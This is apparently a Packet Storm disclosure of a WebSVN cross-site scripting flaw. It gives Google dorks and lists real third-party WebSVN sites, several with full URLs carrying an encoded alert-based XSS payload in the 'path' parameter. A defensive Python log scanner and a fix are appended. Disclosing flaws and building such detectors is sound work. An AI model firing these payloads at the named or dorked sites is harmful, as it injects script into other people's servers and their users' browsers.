WebSVN Cross Site Scripting

2011-12-17T00:00:00
ID PACKETSTORM:107973
Type packetstorm
Reporter Sony
Modified 2011-12-17T00:00:00

Description

                                        
`# Exploit Title: WebSVN Cross Site Scripting  
# Date: 24.12.2011  
# Author: Sony  
# Software Link: http://websvn.tigris.org/  
# Google Dorks: inurl:/svn/listing.php?repname= or intext:"Powered by WebSVN"  
# Version: ???  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
..................................................................  
  
  
Demo:  
  
We have some code (oh, ugly code):  
  
http://codepad.org/pVCU96rQ  
  
http://lostsidedead.com/svn/comp.php?repname=haze&path=&  
  
Put our code in the "With Path:" field and press Enter. Or open  
http://lostsidedead.com/svn/, click on the afftol and then on Compare Paths.  
  
  
http://svn.suretecsystems.com/svn/comp.php?repname=aberdeen.pm&path=&  
  
http://ciclope.fi.upm.es/svn/comp.php?repname=Ciclope+SVN&path=&  
  
http://sheelabs.gamemod.net/svn/comp.php?repname=sheelabs&path=&  
  
http://dev-svn.seasr.org/WebSVN/comp.php?repname=Components&path=%2F&  
  
or :  
  
  
http://code.clearfoundation.com/svn/revision.php?repname=l7-filter&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&rev=324&peg=324  
  
  
http://vector.ucsd.edu/svn/comp.php?repname=vector&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E  
  
or  
  
  
http://christianserving.org/websvn/diff.php?repname=TruePreview&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E  
  
Video : (because it's a specific xss)  
  
http://www.youtube.com/watch?v=e9u0zDCrddk  
`
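
For operators of a WebSVN instance, the requests shown above can be found in web server access logs by decoding the `path` parameter sent to `comp.php`, `revision.php` and `diff.php` and checking it for markup characters. The following is an added example, not part of the original advisory or of WebSVN; the log format (common/combined), the character heuristic and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts whose `path` parameter the advisory shows being reflected.
SCRIPTS = ("comp.php", "revision.php", "diff.php")
# Triage heuristic (assumption): a repository path should not contain these.
MARKUP = re.compile(r'[<>"]')
# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path(url):
    """Return the decoded `path` value if it carries markup, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith(SCRIPTS):
        return None
    # parse_qs performs the first round of decoding; fully_decode does the rest.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("path", []):
        value = fully_decode(raw)
        if MARKUP.search(value):
            return value
    return None

def scan(lines):
    """Return (line number, decoded path) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = suspicious_path(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, made-up repository).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Dec/2011:10:00:01 +0000] "GET /svn/listing.php?repname=demo&path=%2Ftrunk%2F HTTP/1.1" 200 5120',
    '192.0.2.10 - - [17/Dec/2011:10:00:05 +0000] "GET /svn/comp.php?repname=demo&path=%2Ftrunk%2Fsrc HTTP/1.1" 200 4211',
    '198.51.100.7 - - [17/Dec/2011:10:02:11 +0000] "GET /svn/revision.php?repname=demo&path=%2F%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E&rev=324 HTTP/1.1" 200 6033',
    '198.51.100.7 - - [17/Dec/2011:10:02:15 +0000] "GET /svn/diff.php?repname=demo&path=%252F%253Cb%253E HTTP/1.1" 200 5870',
]
```

A hit only shows that markup was sent in `path`; whether it was reflected depends on the installed version, and the durable fix is HTML-encoding the parameter wherever the page echoes it.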